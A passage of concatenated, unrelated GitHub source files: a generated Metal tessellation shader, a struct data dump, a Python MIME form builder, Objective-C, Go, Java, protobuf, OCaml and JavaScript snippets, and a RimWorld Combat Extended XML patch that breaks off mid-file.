spvUnsafeArray<float4, 3> _128 = spvUnsafeArray<float4, 3>({ patchIn.gl_in[0].in_var_TEXCOORD10_centroid, patchIn.gl_in[1].in_var_TEXCOORD10_centroid, patchIn.gl_in[2].in_var_TEXCOORD10_centroid });
spvUnsafeArray<float4, 3> _129 = spvUnsafeArray<float4, 3>({ patchIn.gl_in[0].in_var_TEXCOORD11_centroid, patchIn.gl_in[1].in_var_TEXCOORD11_centroid, patchIn.gl_in[2].in_var_TEXCOORD11_centroid });
spvUnsafeArray<spvUnsafeArray<float4, 3>, 3> _136 = spvUnsafeArray<spvUnsafeArray<float4, 3>, 3>({ spvUnsafeArray<float4, 3>({ patchIn.gl_in[0].in_var_PN_POSITION_0, patchIn.gl_in[0].in_var_PN_POSITION_1, patchIn.gl_in[0].in_var_PN_POSITION_2 }), spvUnsafeArray<float4, 3>({ patchIn.gl_in[1].in_var_PN_POSITION_0, patchIn.gl_in[1].in_var_PN_POSITION_1, patchIn.gl_in[1].in_var_PN_POSITION_2 }), spvUnsafeArray<float4, 3>({ patchIn.gl_in[2].in_var_PN_POSITION_0, patchIn.gl_in[2].in_var_PN_POSITION_1, patchIn.gl_in[2].in_var_PN_POSITION_2 }) });
spvUnsafeArray<float, 3> _137 = spvUnsafeArray<float, 3>({ patchIn.gl_in[0].in_var_PN_WorldDisplacementMultiplier, patchIn.gl_in[1].in_var_PN_WorldDisplacementMultiplier, patchIn.gl_in[2].in_var_PN_WorldDisplacementMultiplier });
spvUnsafeArray<float4, 3> _138 = spvUnsafeArray<float4, 3>({ patchIn.gl_in[0].in_var_PN_DominantVertex1, patchIn.gl_in[1].in_var_PN_DominantVertex1, patchIn.gl_in[2].in_var_PN_DominantVertex1 });
spvUnsafeArray<float3, 3> _139 = spvUnsafeArray<float3, 3>({ patchIn.gl_in[0].in_var_PN_DominantVertex2, patchIn.gl_in[1].in_var_PN_DominantVertex2, patchIn.gl_in[2].in_var_PN_DominantVertex2 });
spvUnsafeArray<float4, 3> _146 = spvUnsafeArray<float4, 3>({ patchIn.gl_in[0].in_var_PN_DominantEdge2, patchIn.gl_in[1].in_var_PN_DominantEdge2, patchIn.gl_in[2].in_var_PN_DominantEdge2 });
spvUnsafeArray<float4, 3> _147 = spvUnsafeArray<float4, 3>({ patchIn.gl_in[0].in_var_PN_DominantEdge3, patchIn.gl_in[1].in_var_PN_DominantEdge3, patchIn.gl_in[2].in_var_PN_DominantEdge3 });
spvUnsafeArray<float3, 3> _148 = spvUnsafeArray<float3, 3>({ patchIn.gl_in[0].in_var_PN_DominantEdge4, patchIn.gl_in[1].in_var_PN_DominantEdge4, patchIn.gl_in[2].in_var_PN_DominantEdge4 });
spvUnsafeArray<float3, 3> _149 = spvUnsafeArray<float3, 3>({ patchIn.gl_in[0].in_var_PN_DominantEdge5, patchIn.gl_in[1].in_var_PN_DominantEdge5, patchIn.gl_in[2].in_var_PN_DominantEdge5 });
float _190 = gl_TessCoord.x * gl_TessCoord.x;
float _191 = gl_TessCoord.y * gl_TessCoord.y;
float _192 = gl_TessCoord.z * gl_TessCoord.z;
float4 _198 = float4(gl_TessCoord.x);
float4 _202 = float4(gl_TessCoord.y);
float4 _207 = float4(gl_TessCoord.z);
float4 _210 = float4(_190 * 3.0);
float4 _214 = float4(_191 * 3.0);
float4 _221 = float4(_192 * 3.0);
float4 _235 = ((((((((((_136[0][0] * float4(_190)) * _198) + ((_136[1][0] * float4(_191)) * _202)) + ((_136[2][0] * float4(_192)) * _207)) + ((_136[0][1] * _210) * _202)) + ((_136[0][2] * _214) * _198)) + ((_136[1][1] * _214) * _207)) + ((_136[1][2] * _221) * _202)) + ((_136[2][1] * _221) * _198)) + ((_136[2][2] * _210) * _207)) + ((((patchIn.in_var_PN_POSITION9 * float4(6.0)) * _207) * _198) * _202);
float3 _237 = float3(gl_TessCoord.x);
float3 _240 = float3(gl_TessCoord.y);
float3 _254 = float3(gl_TessCoord.z);
float3 _256 = ((_128[0].xyz * _237) + (_128[1].xyz * _240)).xyz + (_128[2].xyz * _254);
float4 _259 = ((_129[0] * _198) + (_129[1] * _202)) + (_129[2] * _207);
float3 _264 = _235.xyz;
float3 _265 = _256.xyz;
float3 _266 = _259.xyz;
float3 _272 = _264 + float3(View.View_WorldCameraOrigin);
float _279 = float(int(gl_TessCoord.x == 0.0));
float _282 = float(int(gl_TessCoord.y == 0.0));
float _285 = float(int(gl_TessCoord.z == 0.0));
float _286 = _279 + _282;
float _287 = _286 + _285;
float4 _387;
float3 _388;
if (float(int(_287 == 2.0)) == 1.0)
{
float _363 = float(int((_282 + _285) == 2.0));
float _367 = float(int((_285 + _279) == 2.0));
float _370 = float(int(_286 == 2.0));
_387 = ((float4(_363) * _138[0]) + (float4(_367) * _138[1])) + (float4(_370) * _138[2]);
_388 = ((float3(_363) * _139[0]) + (float3(_367) * _139[1])) + (float3(_370) * _139[2]);
}
else
{
float4 _358;
float3 _359;
if (float(int(_287 == 1.0)) != 0.0)
{
float4 _304 = float4(_279);
float4 _306 = float4(_282);
float4 _309 = float4(_285);
float4 _311 = ((_304 * _146[0]) + (_306 * _146[1])) + (_309 * _146[2]);
float4 _316 = ((_304 * _147[0]) + (_306 * _147[1])) + (_309 * _147[2]);
float3 _331 = float3(_279);
float3 _333 = float3(_282);
float3 _336 = float3(_285);
float3 _338 = ((_331 * _148[0]) + (_333 * _148[1])) + (_336 * _148[2]);
float3 _343 = ((_331 * _149[0]) + (_333 * _149[1])) + (_336 * _149[2]);
_358 = ((_304 * ((_202 * _311) + (_207 * _316))) + (_306 * ((_207 * _311) + (_198 * _316)))) + (_309 * ((_198 * _311) + (_202 * _316)));
_359 = ((_331 * ((_240 * _338) + (_254 * _343))) + (_333 * ((_254 * _338) + (_237 * _343)))) + (_336 * ((_237 * _338) + (_240 * _343)));
}
else
{
_358 = float4(_259.xyz, 0.0);
_359 = _265;
}
_387 = _358;
_388 = _359;
}
float3x3 _398;
if (float(int(_287 == 0.0)) == 0.0)
{
_398 = float3x3(_388, cross(_387.xyz, _388) * float3(_387.w), _387.xyz);
}
else
{
_398 = float3x3(_265, cross(_266, _265) * float3(_259.w), _266);
}
float3 _411 = fast::min(fast::max((_272 - View.View_GlobalVolumeCenterAndExtent[0].xyz) + View.View_GlobalVolumeCenterAndExtent[0].www, float3(0.0)), fast::max((View.View_GlobalVolumeCenterAndExtent[0].xyz + View.View_GlobalVolumeCenterAndExtent[0].www) - _272, float3(0.0)));
float _547;
if (fast::min(_411.x, fast::min(_411.y, _411.z)) > (View.View_GlobalVolumeCenterAndExtent[0].w * View.View_GlobalVolumeTexelSize))
{
_547 = View_GlobalDistanceFieldTexture0.sample(View_GlobalDistanceFieldSampler0, ((_272 * View.View_GlobalVolumeWorldToUVAddAndMul[0u].www) + View.View_GlobalVolumeWorldToUVAddAndMul[0u].xyz), level(0.0)).x;
}
else
{
float3 _436 = fast::min(fast::max((_272 - View.View_GlobalVolumeCenterAndExtent[1].xyz) + View.View_GlobalVolumeCenterAndExtent[1].www, float3(0.0)), fast::max((View.View_GlobalVolumeCenterAndExtent[1].xyz + View.View_GlobalVolumeCenterAndExtent[1].www) - _272, float3(0.0)));
float _535;
if (fast::min(_436.x, fast::min(_436.y, _436.z)) > (View.View_GlobalVolumeCenterAndExtent[1].w * View.View_GlobalVolumeTexelSize))
{
_535 = View_GlobalDistanceFieldTexture1.sample(View_GlobalDistanceFieldSampler0, ((_272 * View.View_GlobalVolumeWorldToUVAddAndMul[1u].www) + View.View_GlobalVolumeWorldToUVAddAndMul[1u].xyz), level(0.0)).x;
}
else
{
float3 _459 = fast::min(fast::max((_272 - View.View_GlobalVolumeCenterAndExtent[2].xyz) + View.View_GlobalVolumeCenterAndExtent[2].www, float3(0.0)), fast::max((View.View_GlobalVolumeCenterAndExtent[2].xyz + View.View_GlobalVolumeCenterAndExtent[2].www) - _272, float3(0.0)));
float3 _475 = fast::min(fast::max((_272 - View.View_GlobalVolumeCenterAndExtent[3].xyz) + View.View_GlobalVolumeCenterAndExtent[3].www, float3(0.0)), fast::max((View.View_GlobalVolumeCenterAndExtent[3].xyz + View.View_GlobalVolumeCenterAndExtent[3].www) - _272, float3(0.0)));
float _480 = fast::min(_475.x, fast::min(_475.y, _475.z));
float _523;
if (fast::min(_459.x, fast::min(_459.y, _459.z)) > (View.View_GlobalVolumeCenterAndExtent[2].w * View.View_GlobalVolumeTexelSize))
{
_523 = View_GlobalDistanceFieldTexture2.sample(View_GlobalDistanceFieldSampler0, ((_272 * View.View_GlobalVolumeWorldToUVAddAndMul[2u].www) + View.View_GlobalVolumeWorldToUVAddAndMul[2u].xyz), level(0.0)).x;
}
else
{
float _511;
if (_480 > (View.View_GlobalVolumeCenterAndExtent[3].w * View.View_GlobalVolumeTexelSize))
{
_511 = mix(View.View_MaxGlobalDistance, View_GlobalDistanceFieldTexture3.sample(View_GlobalDistanceFieldSampler0, ((_272 * View.View_GlobalVolumeWorldToUVAddAndMul[3u].www) + View.View_GlobalVolumeWorldToUVAddAndMul[3u].xyz), level(0.0)).x, fast::clamp((_480 * 10.0) * View.View_GlobalVolumeWorldToUVAddAndMul[3].w, 0.0, 1.0));
}
else
{
_511 = View.View_MaxGlobalDistance;
}
_523 = _511;
}
_535 = _523;
}
_547 = _535;
}
float3 _565 = _264 + ((_398[2] * float3(fast::min(_547 + Material.Material_ScalarExpressions[0].z, 0.0) * Material.Material_ScalarExpressions[0].w)) * float3(((_137[0] * gl_TessCoord.x) + (_137[1] * gl_TessCoord.y)) + (_137[2] * gl_TessCoord.z)));
float4 _574 = View.View_TranslatedWorldToClip * float4(_565.x, _565.y, _565.z, _235.w);
float4 _579 = _574;
_579.z = _574.z + (0.001000000047497451305389404296875 * _574.w);
out.gl_Position = _579;
out.out_var_TEXCOORD6 = ((_120[0] * _198) + (_120[1] * _202)) + (_120[2] * _207);
out.out_var_TEXCOORD7 = ((_121[0] * _198) + (_121[1] * _202)) + (_121[2] * _207);
out.out_var_TEXCOORD10_centroid = float4(_256.x, _256.y, _256.z, _118.w);
out.out_var_TEXCOORD11_centroid = _259;
out.gl_ClipDistance[0u] = dot(View.View_GlobalClippingPlane, float4(_565.xyz - float3(View.View_PreViewTranslation), 1.0));
return out;
}
| {
"pile_set_name": "Github"
} |
Name: var39
Rank: 2
Dimensions: 2 x 1
Class Type: Structure
Data Type: Structure
Fields[4] {
Name: field1
Rank: 2
Dimensions: 1 x 1
Class Type: Single Precision Array (complex)
Data Type: IEEE 754 single-precision
{
1 + 51i
}
Name: field2
Rank: 2
Dimensions: 3 x 4
Class Type: Single Precision Array (complex)
Data Type: IEEE 754 single-precision
{
2 + 52i 5 + 55i 8 + 58i 11 + 61i
3 + 53i 6 + 56i 9 + 59i 12 + 62i
4 + 54i 7 + 57i 10 + 60i 13 + 63i
}
Name: field1
Rank: 2
Dimensions: 1 x 1
Class Type: Single Precision Array (complex)
Data Type: IEEE 754 single-precision
{
14 + 64i
}
Name: field2
Rank: 2
Dimensions: 3 x 4
Class Type: Single Precision Array (complex)
Data Type: IEEE 754 single-precision
{
15 + 65i 18 + 68i 21 + 71i 24 + 74i
16 + 66i 19 + 69i 22 + 72i 25 + 75i
17 + 67i 20 + 70i 23 + 73i 26 + 76i
}
}
| {
"pile_set_name": "Github"
} |
def form_builder(parts):
    """Build a multipart/form-data MIME message from part descriptions.

    Each item in ``parts`` is a dict with keys:
      name:        form field name (Content-Disposition ``name`` parameter)
      type:        key of a registered mimifier (see the ``@mimifier`` decorator)
      value:       payload handed to the mimifier
      kws:         optional extra keyword arguments for the mimifier
      disposition: optional extra Content-Disposition parameters

    Raises ValueError if a part names an unregistered type.
    """
    # No `global` needed: _mimifiers is only read, never rebound.
    form_mime = mimify('multipart', _subtype='form-data')
    for props in parts:
        part_type = props.get('type')
        builder = _mimifiers.get(part_type)
        if builder is None:
            # Fail with a clear message instead of "'NoneType' is not callable".
            raise ValueError('no mimifier registered for type %r' % (part_type,))
        mime_part = builder(props.get('value'), **props.get('kws', {}))
        mime_part.add_header('Content-Disposition', 'form-data',
                             name=props.get('name'),
                             **props.get('disposition', {}))
        form_mime.attach(mime_part)
    return form_mime
# Registry mapping a short type name to the function that builds its MIME part.
_mimifiers = {}


def mimifier(name):
    """Decorator: register the decorated builder under `name` in _mimifiers."""
    def registerer(f):
        # Mutating the module-level dict needs no `global` statement.
        _mimifiers[name] = f
        return f
    return registerer
# Types whose class name is not simply str.capitalize() of the module name.
_cap_names = {'nonmultipart': 'NonMultipart'}


def mimify(type, **kwargs):
    """Instantiate ``email.mime.<type>.MIME<Type>`` with ``kwargs``.

    e.g. ``mimify('text', _text='hi')`` -> ``MIMEText('hi')``.
    The parameter is named ``type`` (shadowing the builtin) for backward
    compatibility with existing keyword callers.
    """
    import importlib
    cap_name = _cap_names.get(type, type.capitalize())
    # importlib.import_module returns the leaf module directly, unlike the
    # old ``getattr(__import__('email.mime.%s' % type).mime, type)`` dance.
    mime_mod = importlib.import_module('email.mime.%s' % type)
    mime_type = getattr(mime_mod, 'MIME%s' % cap_name)
    return mime_type(**kwargs)
@mimifier('text')
def mime_text(text, encoding = 'utf8'):
    # Build a text part with the given charset.
    # NOTE(review): the payload is passed as *bytes* (text.encode(encoding)),
    # which matches the Python 2 email API; Python 3's MIMEText expects str —
    # confirm which interpreter this module targets.
    return mimify('text', _text = text.encode(encoding), _charset = encoding)
@mimifier('text-noenc')
def mime_text_noenc(text, encoding = 'ascii'):
    # text/plain part that bypasses MIMEText's transfer-encoding machinery:
    # the payload is attached pre-encoded and the charset is set afterwards.
    mimeobj = mimify('nonmultipart', _maintype = 'text', _subtype = 'plain',)
    mimeobj.set_payload(text.encode(encoding))
    mimeobj.set_charset(encoding)
    return mimeobj
@mimifier('application')
def mime_app(data):
    # Wrap raw bytes as MIMEApplication (application/octet-stream by default).
    return mimify('application', _data = data)
def subtype_for_image(data):
    # Sniff the image format name (e.g. 'png', 'jpeg') for use as a MIME
    # subtype.  `data` may be a file-like object, a filesystem path, or the
    # raw image bytes.
    # NOTE(review): imghdr is deprecated and removed in Python 3.13 —
    # consider replacing with an explicit magic-number check.
    import imghdr, os.path
    if hasattr(data, 'read') or os.path.exists(data):
        # File-like object or existing path: imghdr reads the header itself.
        return imghdr.what(data)
    else:
        # Raw bytes: passed via the `h` argument, filename is unused (None).
        return imghdr.what(None, data)
@mimifier('image')
def mime_image(data):
    # image/<subtype> part; the subtype is sniffed from the image data itself.
    subtype = subtype_for_image(data)
    return mimify('image', _imagedata = data, _subtype = subtype)
@mimifier('image-noenc')
def mime_image_noenc(data, filename = None):
    import email.encoders as encoders
    # image/<subtype> part with no content-transfer-encoding (encode_noop),
    # i.e. the image bytes are attached verbatim.
    subtype = subtype_for_image(data)
    mimeobj = mimify('image', _imagedata = data, _subtype = subtype, _encoder = encoders.encode_noop)
    if filename is not None:
        # TODO(review): `filename` is accepted but currently ignored —
        # presumably it was meant to set a Content-Disposition filename
        # parameter; confirm intent before implementing.
        pass
    return mimeobj
@mimifier('data')
def mime_data(data):
    """Completely bare MIME part: the header list is cleared after
    construction so only the raw payload remains. Useful for attaching a
    blob that must carry no Content-Type/encoding headers at all.
    """
    # The original imported email.encoders here but never used it.
    mimeobj = mimify('nonmultipart', _maintype = '', _subtype = '')
    mimeobj._headers[:] = []
    mimeobj.set_payload(data)
    return mimeobj
| {
"pile_set_name": "Github"
} |
/* Generated by RuntimeBrowser.
*/
/* History entry backed by a navigation route. Generated header; the
 * accessor semantics below are inferred from their names -- confirm
 * against runtime behaviour before depending on them. */
@protocol MSPHistoryEntryRoute <MSPHistoryEntry>

@required

- (GEOComposedWaypoint *)endWaypoint;     /* route destination */
- (bool)isFailed;                         /* presumably: routing/navigation failed */
- (bool)navigationWasInterrupted;         /* user or system cut navigation short */
- (GEOURLRouteHandle *)routeHandle;       /* handle for re-fetching the route */
- (GEOComposedWaypoint *)startWaypoint;   /* route origin */
- (long long)transportType;               /* NOTE(review): enum values unknown from here */

@end
| {
"pile_set_name": "Github"
} |
// Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT.
// Package comprehend provides the client and types for making API
// requests to Amazon Comprehend.
//
// Amazon Comprehend is an AWS service for gaining insight into the content
// of documents. Use these actions to determine the topics contained in your
// documents, the topics they discuss, the predominant sentiment expressed in
// them, the predominant language used, and more.
//
// See https://docs.aws.amazon.com/goto/WebAPI/comprehend-2017-11-27 for more information on this service.
//
// See comprehend package documentation for more information.
// https://docs.aws.amazon.com/sdk-for-go/api/service/comprehend/
//
// Using the Client
//
// To contact Amazon Comprehend with the SDK use the New function to create
// a new service client. With that client you can make API requests to the service.
// These clients are safe to use concurrently.
//
// See the SDK's documentation for more information on how to use the SDK.
// https://docs.aws.amazon.com/sdk-for-go/api/
//
// See aws.Config documentation for more information on configuring SDK clients.
// https://docs.aws.amazon.com/sdk-for-go/api/aws/#Config
//
// See the Amazon Comprehend client Comprehend for more
// information on creating client for this service.
// https://docs.aws.amazon.com/sdk-for-go/api/service/comprehend/#New
package comprehend
| {
"pile_set_name": "Github"
} |
package org.how.tomcat.works.ex02;
import java.net.URL;
import java.net.URLClassLoader;
import java.net.URLStreamHandler;
import java.io.File;
import java.io.IOException;
import javax.servlet.Servlet;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
public class ServletProcessor2 {
public void process(Request request, Response response) {
String uri = request.getUri();
String servletName = uri.substring(uri.lastIndexOf("/") + 1);
URLClassLoader loader = null;
try {
// create a URLClassLoader
URL[] urls = new URL[1];
URLStreamHandler streamHandler = null;
File classPath = new File(Constants.WEB_ROOT);
// the forming of repository is taken from the createClassLoader method in
// org.apache.catalina.startup.ClassLoaderFactory
String repository = (new URL("file", null, classPath.getCanonicalPath() + File.separator)).toString() ;
// the code for forming the URL is taken from the addRepository method in
// org.apache.catalina.loader.StandardClassLoader class.
urls[0] = new URL(null, repository, streamHandler);
loader = new URLClassLoader(urls);
}
catch (IOException e) {
System.out.println(e.toString() );
}
Class myClass = null;
try {
myClass = loader.loadClass(servletName);
}
catch (ClassNotFoundException e) {
System.out.println(e.toString());
}
Servlet servlet = null;
RequestFacade requestFacade = new RequestFacade(request);
ResponseFacade responseFacade = new ResponseFacade(response);
try {
servlet = (Servlet) myClass.newInstance();
servlet.service((ServletRequest) requestFacade, (ServletResponse) responseFacade);
}
catch (Exception e) {
System.out.println(e.toString());
}
catch (Throwable e) {
System.out.println(e.toString());
}
}
} | {
"pile_set_name": "Github"
} |
{
"ctm": {
"ctm_version": 1,
"type": "ctm",
"textures": [
"chisel:blocks/dirt/reinforcedDirt-ctm"
]
}
} | {
"pile_set_name": "Github"
} |
// Protocol Buffers for Go with Gadgets
//
// Copyright (c) 2013, The GoGo Authors. All rights reserved.
// http://github.com/gogo/protobuf
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
syntax = "proto2";
package unmarshalmerge;
import "github.com/gogo/protobuf/gogoproto/gogo.proto";
option (gogoproto.equal_all) = true;
option (gogoproto.verbose_equal_all) = true;
option (gogoproto.stringer_all) = true;
option (gogoproto.gostring_all) = true;
option (gogoproto.goproto_stringer_all) = false;
option (gogoproto.testgen_all) = true;
option (gogoproto.populate_all) = true;
option (gogoproto.benchgen_all) = true;
// Big: a nested message plus a scalar, decoded with the generated (safe)
// unmarshaler; used to exercise merge semantics on repeated decode.
message Big {
	option (gogoproto.unmarshaler) = true;
	optional Sub Sub = 1;
	optional int64 Number = 2;
}

// BigUnsafe: identical shape to Big, but decoded with the unsafe
// (pointer-casting) unmarshaler so both code paths are covered.
message BigUnsafe {
	option (gogoproto.unsafe_unmarshaler) = true;
	optional Sub Sub = 1;
	optional int64 Number = 2;
}

// Sub: the nested leaf message shared by Big and BigUnsafe.
message Sub {
	option (gogoproto.unmarshaler) = true;
	optional int64 SubNumber = 1;
}

// IntMerge: one non-nullable field for each integer wire encoding
// (varint, zigzag, fixed-width) plus bool, mixing required and optional,
// to exercise merge behaviour across all of them.
message IntMerge {
	option (gogoproto.unmarshaler) = true;
	required int64 Int64 = 1 [(gogoproto.nullable) = false];
	optional int32 Int32 = 2 [(gogoproto.nullable) = false];
	required sint32 Sint32 = 3 [(gogoproto.nullable) = false];
	optional sint64 Sint64 = 4 [(gogoproto.nullable) = false];
	optional uint64 Uint64 = 5 [(gogoproto.nullable) = false];
	required uint32 Uint32 = 6 [(gogoproto.nullable) = false];
	optional fixed64 Fixed64 = 7 [(gogoproto.nullable) = false];
	optional fixed32 Fixed32 = 8 [(gogoproto.nullable) = false];
	required sfixed32 Sfixed32 = 9 [(gogoproto.nullable) = false];
	optional sfixed64 Sfixed64 = 10 [(gogoproto.nullable) = false];
	optional bool Bool = 11 [(gogoproto.nullable) = false];
}
| {
"pile_set_name": "Github"
} |
/*-
* #%L
* rapidoid-rest
* %%
* Copyright (C) 2014 - 2020 Nikolche Mihajlovski and contributors
* %%
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* #L%
*/
package org.rapidoid.http.handler.optimized;
import org.rapidoid.annotation.Authors;
import org.rapidoid.annotation.Since;
import org.rapidoid.http.FastHttp;
import org.rapidoid.http.HttpRoutes;
import org.rapidoid.http.Req;
import org.rapidoid.http.Resp;
import org.rapidoid.http.handler.AbstractDecoratingHttpHandler;
import org.rapidoid.http.impl.RouteOptions;
import org.rapidoid.lambda.OneParamLambda;
import org.rapidoid.net.abstracts.Channel;
import org.rapidoid.u.U;
/**
 * Route handler that delegates to a user-supplied lambda taking only the
 * {@link Resp} object; decoration (wrapping, content-type handling, etc.)
 * is inherited from {@link AbstractDecoratingHttpHandler}.
 */
@Authors("Nikolche Mihajlovski")
@Since("5.1.0")
public class DelegatingParamsAwareRespHandler extends AbstractDecoratingHttpHandler {

    // User lambda; unchecked-cast once at construction time via U.cast.
    private final OneParamLambda<Object, Resp> handler;

    public DelegatingParamsAwareRespHandler(FastHttp http, HttpRoutes routes, RouteOptions options, OneParamLambda<?, ?> handler) {
        super(http, options);
        // NOTE(review): `routes` is accepted but unused here -- presumably
        // kept for signature parity with sibling handlers; confirm.
        this.handler = U.cast(handler);
    }

    @Override
    protected Object handleReq(Channel channel, boolean isKeepAlive, Req req) throws Exception {
        // Only the response object is handed to the lambda; the request is
        // reachable through it via req.response().
        return handler.execute(req.response());
    }

    @Override
    public String toString() {
        return contentTypeInfo("(Resp) -> ...");
    }
}
| {
"pile_set_name": "Github"
} |
open Core_kernel
(* Emit a small random test fixture on stdout: a header line "n k"
   followed by n lines of three space-separated random integers in
   [0, k). Uses Core_kernel's printf/String.concat. *)
let () =
  Random.self_init();
  (* n: number of data rows (1..10); k: exclusive upper bound (1..100) *)
  let n = 1 + Random.int 10
  and k = 1 + Random.int 100 in
  printf "%d %d\n" n k;
  for i = 1 to n do
    (* three random values per row, rendered as a single line *)
    List.init 3 (fun _ -> Random.int k |> Int.to_string)
    |> String.concat ~sep:" " |> print_endline
  done
| {
"pile_set_name": "Github"
} |
var SummaryPart = require('../../models/summaryPart');
var indexLevels = require('./indexLevels');
/**
Returns a new Summary with a part inserted at given index
@param {Summary} summary
@param {Part} part
@param {Number} index
@return {Summary}
*/
function insertPart(summary, part, index) {
    // Normalise the incoming value into a SummaryPart record first.
    var newPart = SummaryPart(part);
    // Splice it into the parts list, then renumber levels on the result.
    var updatedParts = summary.getParts().insert(index, newPart);
    return indexLevels(summary.set('parts', updatedParts));
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8" ?>
<Patch>
<Operation Class="PatchOperationSequence">
<success>Always</success>
<operations>
<li Class="CombatExtended.PatchOperationFindMod">
<modName>[RH] Faction: Umbra Company</modName>
</li>
<!-- ========== Reduce meals and medicine carried by all pawns ========== -->
<li Class="PatchOperationReplace">
<xpath>Defs/PawnKindDef[@Name="RH_UmbraCompany_Base"]/invNutrition</xpath>
<value>
<invNutrition>1</invNutrition>
</value>
</li>
<li Class="PatchOperationRemove">
<xpath>Defs/PawnKindDef[@Name="RH_UmbraCompany_Base"]/inventoryOptions</xpath>
</li>
<li Class="PatchOperationReplace">
<xpath>Defs/PawnKindDef[
defName="RH_UmbraCompany_Rogue" or
defName="RH_UmbraCompany_CQB_TierII" or
defName="RH_UmbraCompany_Assault" or
defName="RH_UmbraCompany_Assault_TierII" or
defName="RH_UmbraCompany_Gunner" or
defName="RH_UmbraCompany_Grenadier" or
defName="RH_UmbraCompany_Boss" or
defName="RH_UmbraCompany_Elite"
]/inventoryOptions/subOptionsChooseOne</xpath>
<value>
<subOptionsChooseOne>
<li>
<thingDef>RNMedicine_IFAK_Multicam</thingDef>
<countRange>
<min>0</min>
<max>1</max>
</countRange>
</li>
<li>
<thingDef>RNMedicine_MedicBag</thingDef>
<countRange>
<min>0</min>
<max>1</max>
</countRange>
</li>
</subOptionsChooseOne>
</value>
</li>
<li Class="PatchOperationReplace">
<xpath>Defs/PawnKindDef[
defName="RH_UmbraCompany_CQB" or
defName="RH_UmbraCompany_Marksman" or
defName="RH_UmbraCompany_Marksman_TierII" or
defName="RH_UmbraCompany_Sniper" or
defName="RH_UmbraCompany_APCCrewman"
]/inventoryOptions/subOptionsChooseOne</xpath>
<value>
<subOptionsChooseOne>
<li>
<thingDef>RNMedicine_IFAK_Multicam</thingDef>
<countRange>
<min>0</min>
<max>1</max>
</countRange>
</li>
</subOptionsChooseOne>
</value>
</li>
<!-- ========== Remove smokepop belt ========== -->
<li Class="PatchOperationRemove">
<xpath>Defs/PawnKindDef[
defName="RH_UmbraCompany_Rogue" or
defName="RH_UmbraCompany_Marksman" or
defName="RH_UmbraCompany_Marksman_TierII" or
defName="RH_UmbraCompany_Sniper" or
defName="RH_UmbraCompany_Assault_TierII" or
@Name="RH_UCEliteTierBase" or
defName="RH_UmbraCompany_Trader"
]/apparelTags/li[.="BeltDefensePop"]</xpath>
</li>
<li Class="PatchOperationRemove">
<xpath>Defs/PawnKindDef[
defName="RH_UmbraCompany_Rogue" or
defName="RH_UmbraCompany_Marksman" or
defName="RH_UmbraCompany_Marksman_TierII" or
defName="RH_UmbraCompany_Sniper" or
defName="RH_UmbraCompany_Assault_TierII" or
defName="RH_UmbraCompany_Boss" or
defName="RH_UmbraCompany_Elite" or
defName="RH_UmbraCompany_Trader"
]/apparelRequired/li[.="Apparel_SmokepopBelt"]</xpath>
</li>
<!-- ========== Umbra Company faction pawns should spawn backpacks, allowing them to carry their (huge) inventory ========== -->
<li Class="PatchOperationAdd">
<xpath>Defs/PawnKindDef[
defName="RH_UmbraCompany_Rogue" or
defName="RH_UmbraCompany_CQB" or
defName="RH_UmbraCompany_CQB_TierII" or
defName="RH_UmbraCompany_Marksman" or
defName="RH_UmbraCompany_Marksman_TierII" or
defName="RH_UmbraCompany_Sniper" or
defName="RH_UmbraCompany_Assault" or
defName="RH_UmbraCompany_Assault_TierII" or
defName="RH_UmbraCompany_Gunner" or
defName="RH_UmbraCompany_Grenadier" or
defName="RH_UmbraCompany_Boss" or
defName="RH_UmbraCompany_Elite" or
defName="RH_UmbraCompany_Trader" or
defName="RH_UmbraCompany_APCCrewman"
]/apparelRequired</xpath>
<value>
<li>Apparel_Backpack</li>
</value>
</li>
<!-- ========== Umbra Company faction pawns should spawn with ammo appropriate to their primary weapon, as well as a sidearm (and its own ammo) ========== -->
<!-- First remove redundant M9 HRT from pawns' existing primary weaponTags -->
<li Class="PatchOperationRemove">
<xpath>Defs/PawnKindDef[defName="RH_UmbraCompany_APCCrewman"]/weaponTags/li[.="RN_M9HRT"]</xpath>
</li>
<!-- Also remove C4 from standard Grenadiers, so the magazine count patch doesn't crowd out the room required for the sidearm -->
<li Class="PatchOperationRemove">
<xpath>Defs/PawnKindDef[defName="RH_UmbraCompany_Grenadier"]/weaponTags/li[.="RH_UC_Explosives"]</xpath>
</li>
<li Class="PatchOperationAddModExtension">
<xpath>Defs/PawnKindDef[
defName="RH_UmbraCompany_Rogue" or
defName="RH_UmbraCompany_APCCrewman" or
defName="RH_UmbraCompany_Assault" or
defName="RH_UmbraCompany_Assault_TierII" or
defName="RH_UmbraCompany_Boss" or
defName="RH_UmbraCompany_CQB" or
